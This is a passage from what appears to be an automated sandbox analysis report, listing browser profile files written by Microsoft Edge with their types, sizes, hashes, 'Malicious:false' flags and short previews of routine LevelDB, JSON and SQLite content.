                                                                                                                                                                  Preview:2025/01/06-17:17:55.472 1870 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/06-17:17:55.473 1870 Recovering log #3.2025/01/06-17:17:55.520 1870 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\01d365ab-082b-4d2f-8791-64cd961728cc.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\357b22ab-be28-45e5-962a-24aff917b8f1.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):111
                                                                                                                                                                  Entropy (8bit):4.718418993774295
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                  MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                  SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                  SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                  SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\75f65244-79ff-4017-923f-febccfa99661.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\772125c1-40e9-4c66-a95f-a3a78cca9998.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):193
                                                                                                                                                                  Entropy (8bit):4.864047146590611
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                                  MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                                  SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                                  SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                                  SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State~RF4fc0f.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):193
                                                                                                                                                                  Entropy (8bit):4.864047146590611
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                                  MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                                  SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                                  SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                                  SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Reporting and NEL

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                  Entropy (8bit):0.555790634850688
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                                                                                                                                                  MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                                                                                                                                                  SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                                                                                                                                                  SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                                                                                                                                                  SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF4198f.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                  Entropy (8bit):0.36515621748816035
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                  MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                  SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                  SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                  SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                  Entropy (8bit):3.4921535629071894
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                  MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                  SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                  SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                  SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):420
                                                                                                                                                                  Entropy (8bit):5.265705425088467
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:7/oDvYfYebvqBZFUtNoZX/zG75JfYebvqBaJ:7/UYfYebvygNCGtJfYebvL
                                                                                                                                                                  MD5:2913583E0ADDEC4617C355D73ABC2D1D
                                                                                                                                                                  SHA1:88686ADF8C78077A349669FA7563E2393B02E302
                                                                                                                                                                  SHA-256:BFB57E096499B4C0EC79C2F075985077B838AF8A26CCFE968C485CA5C5DABBF9
                                                                                                                                                                  SHA-512:6932D74C81D538DCEAC50B39200580496A9C6384A6B1F971B0D8D219706A70CEBF8D027AAE552F3E28B230EF92DB12F010A6980F23B94FF1A02C77B0D5239C23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:18:14.290 1870 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/06-17:18:14.291 1870 Recovering log #3.2025/01/06-17:18:14.301 1870 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):420
                                                                                                                                                                  Entropy (8bit):5.265705425088467
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:7/oDvYfYebvqBZFUtNoZX/zG75JfYebvqBaJ:7/UYfYebvygNCGtJfYebvL
                                                                                                                                                                  MD5:2913583E0ADDEC4617C355D73ABC2D1D
                                                                                                                                                                  SHA1:88686ADF8C78077A349669FA7563E2393B02E302
                                                                                                                                                                  SHA-256:BFB57E096499B4C0EC79C2F075985077B838AF8A26CCFE968C485CA5C5DABBF9
                                                                                                                                                                  SHA-512:6932D74C81D538DCEAC50B39200580496A9C6384A6B1F971B0D8D219706A70CEBF8D027AAE552F3E28B230EF92DB12F010A6980F23B94FF1A02C77B0D5239C23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:18:14.290 1870 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/06-17:18:14.291 1870 Recovering log #3.2025/01/06-17:18:14.301 1870 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):326
                                                                                                                                                                  Entropy (8bit):5.248498112834731
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/Nq2Pwkn23oH+TcwtpIFUtNcZmwzckwOwkn23oH+Tcwta/WLJ:7/NvYfYebmFUtNc/zc5JfYebaUJ
                                                                                                                                                                  MD5:DF21A76B185CDF6F473F9218DD1889EC
                                                                                                                                                                  SHA1:6416E314240B36D26C89F96BFFE6B9BD094D2FC6
                                                                                                                                                                  SHA-256:03376411938BFFD8349EC91280D94221AEEEE5B472D5252BFB0CB1D1BCF83A71
                                                                                                                                                                  SHA-512:DEFAE968D6DAA051F51C10B9B2C24E8E439BC49A7CAC3159F14C3EEB459EFEA9CB638F301B14ABE9512E0449B73E8D540A2EF378FA05C550F6E7C9CCB1FFD51D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.339 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/06-17:17:54.515 1eb4 Recovering log #3.2025/01/06-17:17:54.515 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):326
                                                                                                                                                                  Entropy (8bit):5.248498112834731
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/Nq2Pwkn23oH+TcwtpIFUtNcZmwzckwOwkn23oH+Tcwta/WLJ:7/NvYfYebmFUtNc/zc5JfYebaUJ
                                                                                                                                                                  MD5:DF21A76B185CDF6F473F9218DD1889EC
                                                                                                                                                                  SHA1:6416E314240B36D26C89F96BFFE6B9BD094D2FC6
                                                                                                                                                                  SHA-256:03376411938BFFD8349EC91280D94221AEEEE5B472D5252BFB0CB1D1BCF83A71
                                                                                                                                                                  SHA-512:DEFAE968D6DAA051F51C10B9B2C24E8E439BC49A7CAC3159F14C3EEB459EFEA9CB638F301B14ABE9512E0449B73E8D540A2EF378FA05C550F6E7C9CCB1FFD51D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.339 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/06-17:17:54.515 1eb4 Recovering log #3.2025/01/06-17:17:54.515 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, 1st free page 5, free pages 2, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):0.26707851465859517
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLPp5yN8h6MvDOH+FxOUwa5qVZ7Nkl25Pe2d:TLh8Gxk+6Uwc8NlYC
                                                                                                                                                                  MD5:04F8B790DF73BD7CD01238F4681C3F44
                                                                                                                                                                  SHA1:DF12D0A21935FC01B36A24BF72AB9640FEBB2077
                                                                                                                                                                  SHA-256:96BD789329E46DD9D83002DC40676922A48A3601BF4B5D7376748B34ECE247A0
                                                                                                                                                                  SHA-512:0DD492C371D310121F7FD57D29F8CE92AA2536A74923AC27F9C4C0C1580C849D7779348FC80410DEBB5EEE14F357EBDF33BF670D1E7B6CCDF15D69AC127AB7C3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.......j.j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 89, cookie 0x66, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):184320
                                                                                                                                                                  Entropy (8bit):1.0672194850249064
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:QSqzWMMUfTFnGCTjHbRJkkqtXaWTK+hGgH+6e7EHVumYBSn6:QrzWMffBnzkkqtXnTK+hNH+5EVumn
                                                                                                                                                                  MD5:DF781DD99130CC30C330A59CF7985167
                                                                                                                                                                  SHA1:5BCF92A1459DC5350500088AEB46D2EB9CA7CDA9
                                                                                                                                                                  SHA-256:9505B25A0BDC146198AEAAB70CD417FA41C0850939358DAB5A7D3F0507A00520
                                                                                                                                                                  SHA-512:EA8AFFE2172BEF7831973897CBBFBE41E623DDED2BAA48E6A2C6E0528943DB664569B839D624FA07FB1750AF3912FAB20E7810BD2307BE92FB4D8F5D035A0814
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........f......................................................j............O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 7, cookie 0xb, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):14336
                                                                                                                                                                  Entropy (8bit):0.7836182415564406
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:LLqlCouxhK3thdkSdj5QjUsEGcGBXp22iSBgm+xjgm:uOK3tjkSdj5IUltGhp22iSBgm+xj/
                                                                                                                                                                  MD5:AA9965434F66985F0979719F3035C6E1
                                                                                                                                                                  SHA1:39FC31CBB2BB4F8FA8FB6C34154FB48FBCBAEEF4
                                                                                                                                                                  SHA-256:F42877E694E9AFC76E1BBA279F6EC259E28A7E7C574EFDCC15D58EFAE06ECA09
                                                                                                                                                                  SHA-512:201667EAA3DF7DBCCF296DE6FCF4E79897C1BB744E29EF37235C44821A18EAD78697DFEB9253AA01C0DC28E5758E2AF50852685CDC9ECA1010DBAEE642590CEA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..................n..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.4668379892206187
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0mQip+U:v7doKsKuKZKlZNmu46yjx0ni5
                                                                                                                                                                  MD5:9DB1D9902613D9ED9F7F1B9812D59900
                                                                                                                                                                  SHA1:A16305DED5CA032D5FCED6D15BB2BA5761AB1CFE
                                                                                                                                                                  SHA-256:D5105C0DCA0B8E9083FA1D1E015BA6F99EB6590FECFA02F9F9A1432EE4D18CB4
                                                                                                                                                                  SHA-512:0BC5E9847CD9308B0592963D018B3482748F5385FE394C1131B1B458D5873ED6A1A367401BA1BDC92DD9712B9CFD2E128C8B5D41F9FA04B3414197E0660020D2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                  Malicious:false
